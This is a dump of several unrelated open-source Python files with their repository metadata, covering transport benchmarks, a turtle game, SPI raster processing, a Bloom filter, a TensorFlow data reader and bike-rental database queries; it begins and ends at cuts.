tfinal:\n # print(\"d = t\")\n \n # collided_solution += integrate.nquad(F1, [[0, math.pi], [-x0, x0], [a, b]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n # collided_solution += integrate.nquad(F1_c2, [[0, math.pi], [-x0, x0], [b, c]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n # collided_solution += integrate.nquad(F1_c3, [[0, math.pi], [-x0, x0], [c, d]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n \n return uncollided_solution + collided_solution\n\ndef do_gaussian_ic(x, tfinal):\n integral_1 = integrate.nquad(F, [[-np.inf, np.inf]], args = ([0.0, tfinal, x, 1]), opts = [opts0])[0]\n integral_2 = integrate.nquad(F1, [[0, math.pi], [-np.inf, np.inf]], args = (0.0, x, tfinal, 1), opts = [opts0, opts1])[0]\n return integral_1 + integral_2\n \n\ndef do_gaussian_source(x, tfinal):\n sqrtpi = math.sqrt(math.pi)\n # integral_1 = integrate.nquad(F, [[-np.inf, np.inf], [0, tfinal]], args = (tfinal, x, 1), opts = [opts0, opts1, opts2])[0]\n integral_1 = integrate.nquad(F_gaussian_source, [[0, tfinal]], args = (tfinal, x), opts = [opts0])[0]\n\n integral_2 = integrate.nquad(F1, [[0, math.pi], [-np.inf, np.inf], [0, tfinal]], args = (x, tfinal, 1), opts = [opts0, opts1, opts2])[0]\n return sqrtpi/8 * integral_1 + integral_2\n\n\n\n \ndef make_benchmark_file_structure():\n data_folder = Path(\"moving_mesh_transport/benchmarks\")\n bench_file_path = data_folder / 'benchmarks.hdf5'\n source_name_list = ['plane_IC', 'square_IC', 'square_source', 'gaussian_IC', 'gaussian_source']\n \n f = h5py.File(bench_file_path, \"a\")\n \n for source_name in source_name_list:\n if f.__contains__(source_name):\n del f[source_name]\n f.create_group(source_name)\n \n f.close()\n\ndef write_to_file(xs, phi, tfinal, source_name, npnts):\n data_folder = Path(\"moving_mesh_transport/benchmarks\")\n bench_file_path = data_folder / 'benchmarks.hdf5'\n \n with h5py.File(bench_file_path,'r+') as f:\n if f.__contains__(source_name + f'/t = {tfinal}'):\n del f[source_name + f'/t = {tfinal}'] \n f.create_dataset(source_name + f'/t = {tfinal}', (2, npnts), dtype = \"f\", data=(xs, phi))\n f.close()\n \n\ndef make_benchmarks(tfinal, x0, npnts = [20000, 2000, 500, 2000, 500]):\n print(\"t = \", tfinal)\n xs1 = np.linspace(0, tfinal, npnts[0])\n xs2 = np.linspace(0, tfinal + x0, npnts[1])\n xs3 = np.linspace(0, tfinal + x0, npnts[2])\n xs4 = np.linspace(0, tfinal + 5, npnts[3])\n xs5 = np.linspace(0, tfinal + 5, npnts[4])\n # xs3 = np.array([0.176,1.5])\n times = np.zeros(5)\n phi_pl = xs1*0\n phi_sq = xs2*0\n phi_sqs = xs3*0\n phi_gss = xs4*0\n phi_gss_s = xs5*0\n \n start = timer()\n for i in range(npnts[0]):\n phi_pl[i] = do_ganapol(xs1[i], tfinal, 0.0)\n times[0] = timer() - start\n start = timer()\n print(\"plane finished\")\n for j in range(npnts[1]):\n phi_sq[j] = do_square_ic(xs2[j], tfinal, x0)\n times[1] = timer() - start\n start = timer()\n print(\"square IC finished\")\n for k in range(npnts[2]):\n phi_sqs[k] = do_square_source(xs3[k], tfinal, x0)\n times[2] = timer() - start\n start = timer()\n print(\"square source finished\")\n for h in range(npnts[3]):\n phi_gss[h] = do_gaussian_ic(xs4[h], tfinal)\n times[3] = timer() - start\n start = timer()\n print(\"Gauss IC finished\")\n for l in range(npnts[4]):\n phi_gss_s[l] = do_gaussian_source(xs5[l], tfinal)\n times[4] = timer() - start\n print(\"Gauss source finished\")\n \n \n # plt.plot(xs1, phi_pl, \"-.\",label = \"plane\")\n # plt.plot(xs2, phi_sq, \"--\", label = \"square IC\")\n # plt.plot(xs3, phi_sqs, \":\", label = \"square source\")\n # plt.plot(xs4, phi_gss, \"--*\", label = \"Gaussian IC\")\n # plt.plot(xs5, phi_gss_s, \"--x\", label = \"Gaussian source\")\n # plt.xlabel(\"x\")\n # plt.ylabel(\"scalar flux\")\n # plt.xlim(0,tfinal + x0 + 1)\n # plt.legend()\n \n \n print(\"- - - - - - - - -\")\n print(\"time elapsed\")\n print(times)\n print(\"- - - - - - - - -\")\n print(\"time per evaluation point\")\n print(times/np.array(npnts))\n print(\"- - - - - - - - -\")\n\n \n\n write_to_file(xs1, phi_pl, tfinal, 'plane_IC', npnts[0])\n write_to_file(xs2, phi_sq, tfinal, 'square_IC', npnts[1])\n write_to_file(xs3, phi_sqs, tfinal, 'square_source', npnts[2])\n write_to_file(xs4, phi_gss, tfinal, 'gaussian_IC', npnts[3])\n write_to_file(xs5, phi_gss_s, tfinal, 'gaussian_source', npnts[4])\n\ndef make_square_source(tfinal, x0, npnts = [100]):\n print(\"t = \", tfinal)\n xs1 = np.linspace(0, tfinal + x0, npnts[0])\n # xs3 = np.array([0.176,1.5])\n times = np.zeros(1)\n phi_sqs = xs1*0\n\n start = timer()\n for k in range(npnts[0]):\n phi_sqs[k] = do_square_source(xs1[k], tfinal, x0)\n times[0] = timer() - start\n print(\"square source finished\")\n \n plt.figure(-1)\n # plt.plot(xs1, phi_pl, \"-.\",label = \"plane\")\n # plt.plot(xs2, phi_sq, \"--\", label = \"square IC\")\n plt.plot(xs1, phi_sqs, \"-\", label = \"square source\")\n plt.show()\n # plt.plot(xs4, phi_gss, \"--*\", label = \"Gaussian IC\")\n # plt.plot(xs5, phi_gss_s, \"--x\", label = \"Gaussian source\")\n # plt.xlabel(\"x\")\n # plt.ylabel(\"scalar flux\")\n # plt.xlim(0,tfinal + x0 + 1)\n # plt.legend()\n \n \n print(\"- - - - - - - - -\")\n print(\"time elapsed\")\n print(times)\n print(\"- - - - - - - - -\")\n print(\"time per evaluation point\")\n print(times/np.array(npnts))\n print(\"- - - - - - - - -\")\n write_to_file(xs1, phi_sqs, tfinal, 'square_source', npnts[0])\n \n\ndef make_all():\n x0 = 0.5\n make_benchmarks(1, x0)\n make_benchmarks(5, x0)\n make_benchmarks(10, x0)\n","repo_name":"wbennett39/moving_mesh_radiative_transfer","sub_path":"moving_mesh_transport/benchmarks/old_drafts/make_benchmarks.py","file_name":"make_benchmarks.py","file_ext":"py","file_size_in_byte":7591,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"31359696958","text":"import time\nfrom turtle import Screen\nfrom player import Player\nfrom car_manager import CarManager\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.tracer(0)\n\nlevel=Scoreboard()\nturt=Player()\nscreen.listen()\nscreen.onkey(fun=turt.move ,key=\"Up\")\n\ncar=CarManager()\n\ngame_is_on = True\nwhile game_is_on:\n time.sleep(0.1)\n screen.update()\n car.create_car()\n car.move_car()\n\n position_turt=(turt.xcor(), turt.ycor())\n if car.smash(pos=position_turt) == 1 :\n level.game_over()\n game_is_on = False\n \n if turt.ycor() > 260:\n turt.starting_pos()\n level.update_score()\n car.up_speed()\n\n\nscreen.exitonclick()\n","repo_name":"oguzbulbul/Python-Projects","sub_path":"day23-Turtle_Crossing_Game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"39090845728","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jun 17 20:48:01 2018\n\n@author: anind\n\"\"\"\nfrom spi import SPI\nimport numpy as np\nimport os, random\nfrom PIL import Image\nimport time\nimport gdal\nimport osr\nfrom math import isnan\n\n\n\nspi = SPI()\n \nspi.set_rolling_window_params(\n span=1, window_type=None, center=True)\n\n # Set distribution parameters\nspi.set_distribution_params(dist_type='gam')\n\n\ndef use_spi(arr: np.array) -> np.array:\n\n \n data = spi.calculate(arr, starting_month=1)\n data = data.flatten() \n #Calculate and return 1d array\n return data\n\ndef tiffolder_to_3darr(directory_name) -> np.array:\n '''Returns a 3d array from a directory containing tiff images of\n equal shape.\n For ex: if each image is of shape (460,640) and there are 200 images,\n the returned array will have shape (460,640,200)\n '''\n start = time.time()\n sizeget = ''\n while sizeget[-3:] != 'tif':\n \n sizeget = random.choice(os.listdir(directory_name))\n location = directory_name + \"\\\\\" + sizeget\n im = Image.open(location)\n arr = np.array(im)\n \n y = np.size(arr,1)\n x = np.size(arr,0)\n #getting size of an image (it should match the other images)\n mainarr = np.zeros((x,y,0))\n for file in os.listdir(directory_name):\n #appending arrays of tif file to 3darray\n if file[-3:] == 'tif':\n location = directory_name + \"\\\\\" + file\n im = Image.open(location)\n arr = np.array(im) \n mainarr = np.dstack((mainarr,arr))\n print('added')\n end = time.time()\n print(end - start)\n return mainarr \n\ndef gettypefilelist(directory_name, filetype) -> list:\n lis = []\n for file in os.listdir(directory_name):\n if file.endswith(filetype):\n lis.append(file)\n return lis\n\ndef spi3d(arr: np.array) -> np.array:\n# newarr = arr\n st = time.time()\n for x in range(len(arr)):\n for y in range(len(arr[x])):\n \n cell = arr[x][y]\n lis = []\n \n mlist = []\n for z in range(len(cell)):\n if cell[z] > -0.00000000000000001:\n #print(cell[z]) \n mlist.append(cell[z])\n \n lis.append(z)\n else:\n arr[x][y][z] = np.nan\n# \n# lis = [i for i in range(len(arr[x][y])) if arr[x][y][i] >= 0.00000000001]\n# mlist = [i for i in arr[x][y] if i >= 0.00000000001]\n \n \n modc = np.array(mlist)\n try:\n modc = use_spi(modc) \n \n for k in range(len(modc)):\n pos = lis[k]\n arr[x][y][pos] = modc[k]\n now = time.time()\n print(str(x)+' , '+str(y) + ' : ' + str(now-st))\n except:\n arr[x][y][:] = np.nan\n now = time.time()\n print(str(x)+' , '+str(y) + ' : ' + str(now-st)+\" nan\")\n \n \n# newarr [x][y] = cell \n en = time.time()\n print(en-st)\n \n arr = np.swapaxes(arr,2,0)\n arr = np.swapaxes(arr,1,2)\n \n return arr\n\n\ndef output(loc: str, arr: np.array, l: list, store: str):\n '''loc : location of rainfall files\n arr: 3d array containing spi values\n l: list containing names of files in the same order\n store: store location of spi files\n '''\n sizeget = l[0]\n \n sample = loc + '\\\\' + sizeget\n \n inDs = gdal.Open(sample)\n \n band = inDs.GetRasterBand(1)\n NDV = band.GetNoDataValue()\n \n wkt = inDs.GetProjection()\n \n # setting spatial reference of output raster \n srs = osr.SpatialReference()\n srs.ImportFromWkt(wkt)\n \n gt = inDs.GetGeoTransform()\n \n inDs = None\n \n [rows,cols] = arr[0].shape\n \n driver = gdal.GetDriverByName(\"GTiff\")\n \n \n \n for i in range(len(arr)):\n raster = np.zeros((rows,cols), dtype=np.float32)\n a = arr[i]\n raster = raster + a\n storeloc = store + '\\\\' + l[i]\n dst_ds = driver.Create(storeloc, \n cols, \n rows, \n 1, \n gdal.GDT_Float32)\n \n\n dst_ds.SetProjection( srs.ExportToWkt() )\n \n \n dst_ds.SetGeoTransform(gt)\n \n dst_ds.GetRasterBand(1).SetNoDataValue(NDV)\n \n \n \n \n dst_ds.GetRasterBand(1).WriteArray(raster)\n \n #dst_ds.GetRasterBand(1).WriteArray( narr ) \n \n dst_ds.FlushCache()\n dst_ds = None\n \n print(l[i])\n \n \n \n\n\n\n","repo_name":"anind99/SPI-CALC","sub_path":"spi_calculation.py","file_name":"spi_calculation.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"34598276855","text":"def pattern(word):\n patn = ''\n for letter in word:\n if letter in vowels:\n patn += '*'\n else:\n patn += '-'\n return patn\n\n\nvowels = 'уеыаоэяиюэ'\nword_pattern = input()\npat = pattern(word_pattern)\nvowel_amount = pat.count('*')\nn = int(input())\nfor i in range(n):\n word = input()\n pat_new = pattern(word)\n if pat_new.count('*') == vowel_amount:\n flag = True\n for j in range(len(pat)):\n if pat[j] == '*' and pat_new[j] != '*':\n flag = False\n break\n if flag:\n print(word)\n","repo_name":"grigvlwork/py_prog","sub_path":"attest/rhymes.py","file_name":"rhymes.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8509841786","text":"import os\nfrom typing import Optional, List\nfrom dataclasses import dataclass, field\nfrom sentence_transformers import models, SentenceTransformer\nfrom transformers import HfArgumentParser\n\n\ndef convert_ours_ckpt_to_sentence_transformer(src_dir, dest_dir, pooling_method: List[str] = ['cls'], dense_metric: str=\"cos\"):\n assert os.path.exists(src_dir), f\"Make sure the encoder path {src_dir} is valid on disk!\"\n assert \"decoder\" not in pooling_method, f\"Pooling method 'decode' cannot be saved as sentence_transformers because it uses the decoder stack to produce sentence embedding.\"\n if dest_dir is None:\n dest_dir = src_dir\n\n print(f\"loading model from {src_dir} and saving the sentence_transformer model at {dest_dir}...\")\n\n word_embedding_model = models.Transformer(src_dir)\n modules = [word_embedding_model]\n ndim = word_embedding_model.get_word_embedding_dimension()\n\n if \"cls\" in pooling_method:\n pooling_model = models.Pooling(ndim, pooling_mode=\"cls\")\n pooling_method.remove(\"cls\")\n elif \"mean\" in pooling_method:\n pooling_model = models.Pooling(ndim, pooling_mode=\"mean\")\n pooling_method.remove(\"mean\")\n else:\n raise NotImplementedError(f\"Fail to find cls or mean in pooling_method {pooling_method}!\")\n \n modules.append(pooling_model)\n\n if \"dense\" in pooling_method:\n modules.append(models.Dense(ndim, ndim, bias=False))\n pooling_method.remove(\"dense\")\n \n assert len(pooling_method) == 0, f\"Found unused pooling_method {pooling_method}!\"\n\n if dense_metric == \"cos\":\n normalize_layer = models.Normalize()\n modules.append(normalize_layer)\n\n model = SentenceTransformer(modules=modules, device='cpu')\n model.save(dest_dir)\n\n\n@dataclass\nclass Args:\n encoder: Optional[str] = field(\n default=None,\n metadata={'help': 'Path to the encoder model.'}\n )\n output_dir: Optional[str] = field(\n default=None,\n metadata={'help': 'Path to the output sentence_transformer model.'}\n )\n pooling_method: List[str] = field(\n default_factory=lambda: [\"cls\"],\n metadata={'help': 'Pooling methods to aggregate token embeddings for a sequence embedding. {cls, mean, dense, decoder}'}\n )\n dense_metric: str = field(\n default=\"cos\",\n metadata={'help': 'What type of metric for dense retrieval? ip, l2, or cos.'}\n )\n model_cache_dir: Optional[str] = field(\n default=None,\n metadata={'help': 'Cache folder for huggingface transformers.'}\n )\n\n def __post_init__(self):\n convert_ours_ckpt_to_sentence_transformer(self.encoder, self.output_dir, self.pooling_method, self.dense_metric)\n\nif __name__ == \"__main__\":\n parser = HfArgumentParser([Args])\n args, = parser.parse_args_into_dataclasses()\n\n","repo_name":"FlagOpen/FlagEmbedding","sub_path":"FlagEmbedding/llm_embedder/scripts/ours2st.py","file_name":"ours2st.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":1830,"dataset":"github-code","pt":"94"} +{"seq_id":"38464592211","text":"\ndef isfloat(value):\n try:\n float(value)\n return True\n except:\n return False\n\n\ndef isint(value):\n try:\n int(value)\n return True\n except:\n return False\n\n\nCONVERTERS = {'IntType': lambda x: int(x),\n 'FloatType': lambda x: float(x),\n 'StringType': lambda x: x}\n\n\ndef pick_type(types):\n ''' if there is only one type found\n in a column, then use that. if multiple\n types are found, default back to string.\n '''\n type_set = set(types)\n if len(type_set) == 1:\n return list(type_set)[0]\n elif set(['IntType', 'FloatType']) == type_set:\n # if there is a mix of floats and ints, then the column is floats.\n return 'FloatType'\n else:\n return 'StringType'\n\n\ndef get_column_types(content):\n ''' Figure out what type of content is in each column\n of a csv-like input. This is a simple brute force method that\n attempts to convert the strings of the content into floats and ints.\n if the conversion is successful for all rows tested,\n that type is considered the type of the column.\n '''\n\n # number of rows to check for content\n test_count = min(len(content), 5)\n\n # number of columns\n col_count = len(content[0])\n\n all_types = [[] for i in range(col_count)]\n\n for r_ind in range(test_count):\n for col_ind, col in enumerate(content[r_ind]):\n if isint(col):\n all_types[col_ind].append('IntType')\n elif isfloat(col):\n all_types[col_ind].append('FloatType')\n else:\n all_types[col_ind].append('StringType')\n\n # find if conversions are consistent across rows\n column_types = [pick_type(types) for types in all_types]\n return column_types\n\n\ndef coerce_types(content):\n '''\n Convert types in csv-like content.\n The idea is that when translating to and\n from csv, everything is converted to strings. So, we need to undo that\n conversion for things like counts.\n '''\n if len(content) == 0:\n return content\n\n column_types = get_column_types(content)\n\n coerced_content = []\n for row in content:\n c_row = []\n for col_ind, col in enumerate(row):\n try:\n col = CONVERTERS[column_types[col_ind]](col)\n except ValueError:\n col = col\n c_row.append(col)\n coerced_content.append(c_row)\n return coerced_content\n","repo_name":"learntextvis/textkit","sub_path":"textkit/coerce.py","file_name":"coerce.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"94"} +{"seq_id":"26407347780","text":"from database.postgresql import cur, db\n\n\nasync def insert_oil_service_table(bike_id):\n cur.execute(f\"INSERT INTO oil_services (bike_id, last_oil_change_mileage) \"\n f\"SELECT id, millage FROM bike WHERE id=%s\", (bike_id,))\n db.commit()\n\n\nasync def take_data_from_oil_service(bike_id):\n cur.execute(\"SELECT oil_need_change, last_oil_change_mileage FROM oil_services WHERE bike_id=%s\", (bike_id,))\n result = cur.fetchone()\n return result\n\n\nasync def update_oil_need_change_data(bike_id):\n cur.execute(\"UPDATE oil_services SET oil_need_change = true WHERE bike_id = %s AND oil_need_change = false\",\n (bike_id,))\n db.commit()\n\n\nasync def update_oil_need_change_data_false(bike_id):\n cur.execute(\"UPDATE oil_services SET oil_need_change = false WHERE bike_id = %s AND oil_need_change = true\",\n (bike_id,))\n\n\nasync def update_bike_service_status_exist(bike_id):\n cur.execute(\"SELECT * FROM service WHERE bike_id = %s\",\n (bike_id,))\n result = cur.fetchone()\n return result\n\n\nasync def update_bike_service_status(bike_id):\n exist = await update_bike_service_status_exist(bike_id)\n if not exist:\n cur.execute(\"INSERT INTO service (bike_id, status) VALUES (%s, %s) RETURNING id\", (bike_id, 'oil change'))\n result = cur.fetchone()[0]\n db.commit()\n return result\n else:\n cur.execute(\"UPDATE service SET status = 'oil change' WHERE bike_id = %s RETURNING id\",\n (bike_id,))\n result = cur.fetchone()[0]\n db.commit()\n return result\n\n\nasync def get_open_service():\n cur.execute(\"SELECT * FROM service WHERE open=true\")\n result = cur.fetchall()\n return result\n\n\nasync def db_create_new_task(bike_id, task):\n cur.execute(\"INSERT INTO service (bike_id, status) VALUES (%s, %s) RETURNING id\", (bike_id, task))\n result = cur.fetchone()[0]\n db.commit()\n return result\n\n\nasync def get_bike_id(service_id):\n cur.execute(\"SELECT bike_id FROM service WHERE id=%s\", (service_id,))\n result = cur.fetchone()\n return result\n\n\nasync def delete_service(service_id):\n cur.execute(\"DELETE FROM service WHERE id=%s\", (service_id,))\n db.commit()\n\n\nasync def get_client_damage_service():\n cur.execute(\"SELECT * FROM service WHERE status='client damage'\")\n result = cur.fetchall()\n return result\n\n\nasync def get_not_opened_service():\n cur.execute(\"SELECT * FROM service WHERE open=false\")\n result = cur.fetchall()\n return result\n\n\nasync def update_open_task(start_date,service_id):\n cur.execute(\"UPDATE service SET open=true, start_date=%s WHERE id=%s\", (start_date,service_id,))\n db.commit()\n\n\nasync def get_service_for_bike(bike_id):\n cur.execute(\"SELECT id, start_date, status FROM service WHERE open=true AND bike_id=%s\",(bike_id,))\n result = cur.fetchall()\n return result","repo_name":"west3n/bikerent","sub_path":"database/db_service.py","file_name":"db_service.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24476820854","text":"import xarray as xr\nimport pandas as pd\nfrom tqdm import tqdm\nimport sys\nimport os\nimport time\n\n'''\nAuthor: Cameron Bracken 10-27-2023\n\nCreate VIC domain and param files for each grid point, and organize the files by HUC2\n'''\n\n\ndef process(output_dir):\n\n print(f'Processing domain and params')\n start_time = time.time()\n\n domain = xr.load_dataset('/rcfs/projects/godeeep/VIC/params/namerica_domain.nc')\n params = xr.load_dataset('/rcfs/projects/godeeep/VIC/params/namerica_params.nc')\n grid_ids = pd.read_csv('../data/grid_ids_conus.csv')\n runtime = round((time.time() - start_time)/60, 2)\n print(f\"Loading the datasets took {runtime} minutes\")\n\n # for i, cell in tqdm(grid_ids.iterrows(), total=grid_ids.shape[0]):\n for n, cell in tqdm(grid_ids.iterrows(), total=grid_ids.shape[0]):\n\n i = int(cell.id)\n huc2_code = int(cell.huc2)\n lat = cell.lat\n lon = cell.lon\n\n point_domain = domain.sel(lat=slice(lat, lat), lon=slice(lon, lon))\n point_params = params.sel(lat=slice(lat, lat), lon=slice(lon, lon))\n\n mask = point_domain.mask\n # make sure the mask is set properly\n # mask[0] = 1\n\n root_fract = point_params.root_fract\n\n for k in range(len(root_fract.veg_class)):\n # root fraction was throwing errors so renormalize\n root_fract[k, :] = root_fract[k, :]/sum(root_fract[k, :])\n\n # point_domain['mask'] = mask\n point_params['mask'] = mask\n point_params['run_cell'] = mask\n point_params['root_fract'] = root_fract\n\n # make a subdirectory for each grid point\n point_dir = f'{output_dir}/{huc2_code:02}/{i:07}_{lon:0.5f}_{lat:0.5f}'\n os.makedirs(point_dir, exist_ok=True)\n domain_fn = f'{point_dir}/domain_{i:07}_{lon:0.5f}_{lat:0.5f}.nc'\n params_fn = f'{point_dir}/params_{i:07}_{lon:0.5f}_{lat:0.5f}.nc'\n\n # skip over existing files\n # if not os.path.exists(domain_fn):\n point_domain.to_netcdf(domain_fn)\n\n # if not os.path.exists(params_fn):\n point_params.to_netcdf(params_fn)\n\n runtime = round((time.time() - start_time)/60/60, 2)\n print(f\"Processing completed in {runtime} hours\")\n\n\nif __name__ == \"__main__\":\n output_dir = '/rcfs/projects/godeeep/VIC/inputs_1_16_deg_by_huc2/'\n process(output_dir)\n","repo_name":"GODEEEP/tgw-hydro","sub_path":"params/param-subset-by-huc2.py","file_name":"param-subset-by-huc2.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"32143310092","text":"import sys\n'''\ncomandline arguments:\n bloomfilter.bin size num_hashes checked_data\n'''\n\n\n#reads in the filter\nwith open(sys.argv[1], 'rb') as file:\n FILTER = int.from_bytes(file.read(), byteorder='big')\n\nsize = int(sys.argv[2])\nk = int(sys.argv[3])\nb = 1\n\n#checks the hashes against the filter\nfor i in range(k):\n if not (pow(2, hash(sys.argv[4] + str(i)) % size) & FILTER == pow(2, hash(sys.argv[4] + str(i)) % size)):\n print(sys.argv[4] + \" is not in the list\")\n quit()\n\nprint(sys.argv[4] + \" is likely in the list\")\n\n\n","repo_name":"HenryHelstad/Simple-Bloomfilter","sub_path":"sifter.py","file_name":"sifter.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17209640593","text":"import csv\nimport numpy as np\nfrom smoothing import gaussian_kernel\nimport sys\nsys.path.insert(0,'../Prob_mapgen/')\nfrom create_images import find_crop, create_images\nf=np.load(sys.argv[1])\ndata=csv.reader(open('../Data/4secmodel.csv','r'))\ncoords=csv.reader(open('../Data/4secmodelcoords.csv','r'))\nvals=data.__next__()\ncs=coords.__next__()\nM=np.zeros((512,512,35))\n\nconv=lambda x: (x//512,x%512)\nc=0\nsuffix=sys.argv[1].split('/')[-1].split('.')[0]\n\nwhile c < len(f):\n vals=data.__next__()\n cs=coords.__next__()\n if vals[5]!=suffix:continue\n\n sl=int(vals[4])\n x,y=conv(int(cs[0]))\n if len(f.shape)==1 or f.shape[1]==1:\n M[x,y,sl]=int((1-f[c])*255) #Correction for how I processed it earlier\n else:\n M[x,y,sl]=int(f[c,1]*255)\n c+=1\n\n\nres1=[]\nres2=[]\n#for sigma in np.arange(0,10,0.3):\nsigma=2.5\nMn=gaussian_kernel(np.copy(M),sigma)\n#Get accuracy\nhits=[0,0]\ntot=[0,0]\n\nrefF=np.load('../Data/4secmodel.npz')\nref=refF[suffix+'_label']\nfor z in range(35):\n bounds=find_crop(ref[:,:,z])\n for x in range(bounds[0],bounds[1]):\n for y in range(bounds[2],bounds[3]):\n if ref[x,y,z,0]>0:\n tot[0]+=1\n if Mn[x,y,z]<0.5*255:\n hits[0]+=1\n elif ref[x,y,z,1]>0:\n tot[1]+=1\n if Mn[x,y,z]>0.5*255:\n hits[1]+=1\n#res1.append(hits[0]/tot[0])\n#if (tot[1]==0): res2.append(0)\n#else:res2.append(hits[1]/tot[1])\n\n# import matplotlib.pyplot as plt\n# plt.plot(np.arange(0,10,0.3),res1,c='b')\n# plt.plot(np.arange(0,10,0.3),res2,c='r')\n\n# plt.xlabel('Sigma')\n# plt.ylabel('Accuracy')\n# plt.title('Accuracy for sigma of gaussian kernel (blue is non-cancer')\n# plt.show()\nprint ('Accuracies',hits[0]/tot[0],hits[1]/tot[1])\n\ncreate_images(Mn,ref,suffix,sys.argv[2])\n","repo_name":"PeterQLee/PythonOpenGLtest","sub_path":"Work/BIOTIC/post_convolution/run_flat.py","file_name":"run_flat.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21312969423","text":"import collections\n\nimport tensorflow as tf\n\nfrom dataset import ptb\n\n__all__ = [\n 'train_batch',\n 'test_batch',\n 'valid_batch',\n 'vocab',\n 'Input',\n]\n\n\nclass Input(collections.namedtuple('Input', (\n 'initializer',\n 'x',\n 'y',\n))):\n pass\n\n\ndef vocab(min_word_freq=None):\n return ptb.get_vocab(min_word_freq)\n\n\ndef batch_input(x, y, batch_size, shuffle, eager_execution):\n x_dataset = tf.data.Dataset.from_tensor_slices(x)\n y_dataset = tf.data.Dataset.from_tensor_slices(y)\n\n dataset = tf.data.Dataset.zip((x_dataset, y_dataset))\n if shuffle:\n dataset = dataset.shuffle(buffer_size=100000 * batch_size)\n dataset = dataset.batch(batch_size, drop_remainder=True)\n\n if eager_execution:\n return dataset\n else:\n batched_iter = tf.compat.v1.data.make_initializable_iterator(dataset)\n cur_words, next_words = batched_iter.get_next()\n return Input(\n initializer=batched_iter.initializer, x=cur_words, y=next_words)\n\n\ndef train_batch(vocab,\n batch_size,\n max_length=50,\n stride=3,\n shuffle=False,\n eager_execution=True):\n x, y = ptb.train(vocab, max_length, stride)\n return batch_input(x, y, batch_size, shuffle, eager_execution)\n\n\ndef test_batch(vocab,\n batch_size,\n max_length=50,\n stride=3,\n shuffle=False,\n eager_execution=True):\n x, y = ptb.test(vocab, max_length, stride)\n return batch_input(x, y, batch_size, shuffle, eager_execution)\n\n\ndef valid_batch(vocab,\n batch_size,\n max_length=50,\n stride=3,\n shuffle=False,\n eager_execution=True):\n x, y = ptb.valid(vocab, max_length, stride)\n return batch_input(x, y, batch_size, shuffle, eager_execution)\n","repo_name":"lcy-seso/Carrot","sub_path":"benchmarks/rnnlm/tf_model/data_reader.py","file_name":"data_reader.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"40032458703","text":"def impar(dados):\n Result = 0\n X,Y = map(int,dados)\n if X > Y:\n c = X\n X = Y\n Y = c\n if X ==Y:\n return 0 \n for i in range(X+1,Y):\n if i%2:\n Result = Result+i\n return Result\n\n\nN = int(input())\ndados = [input().split()for i in range(N)]\nfor i in dados: \n print(impar(i))","repo_name":"juaryR/Challenges_Algorithms","sub_path":"beecrowd/Iniciante/1099.py","file_name":"1099.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"12301627993","text":"nota = 0\r\n\r\npessoas = float(input('Quantas pessoas vão viajar ? '))\r\ndiaP = (input('compraram a passagem 3 dias antes do embarque (S) para sim (N) ? '))\r\ndiaria = float(input('quantos dias irão ficar '))\r\nat = float(input('Os dois tiveram a autorização para ferias (1) para sim (2) para não '))\r\nfilho = (input('Tem filhos (S) para sim (N) para não '))\r\nif filho == 'S':\r\n nota = float(input('informe a nota do filho ')) \r\n\r\nsalario = (input('O salario foi liberado antes do dia 12 de dezembro (S) para sim (N) para não '))\r\n\r\nif diaP == 'S':\r\n total = 1100 * pessoas\r\n diar = 566.66 * diaria\r\n totalFull = total + diar \r\nelse:\r\n total = 890 * pessoas\r\n diar = float(566.66 * diaria)\r\n totalFull = total + diar \r\nif at == 1:\r\n atv = 'A'\r\nelse:\r\n atv = 'B'\r\n\r\n\r\nif nota >= 6:\r\n notaV = 'A'\r\nelse:\r\n notaV = 'B'\r\n\r\nif salario == 'S':\r\n salarioV = 'A'\r\nelse:\r\n salario = 'B' \r\n\r\nif totalFull <= 10000:\r\n NaN = 'A'\r\nelse:\r\n NaN = 'B'\r\n\r\nif atv == 'A' and notaV == 'A' and salarioV == 'A' and NaN == 'A':\r\n print('Pode viajar filho')\r\nelse:\r\n print('Num pode')\r\n\r\nprint('Valor total: %d' %totalFull)","repo_name":"LiR4/ex-python","sub_path":"ex/ex-2.py","file_name":"ex-2.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"18346536897","text":"\"\"\"\nSortinoHyperOptLossDaily\n\nThis module defines the alternative HyperOptLoss class which can be used for\nHyperoptimization.\n\"\"\"\nimport math\nfrom datetime import datetime\n\nfrom pandas import DataFrame, date_range\n\nfrom freqtrade.optimize.hyperopt import IHyperOptLoss\n\n\nclass SortinoHyperOptLossDaily(IHyperOptLoss):\n \"\"\"\n Defines the loss function for 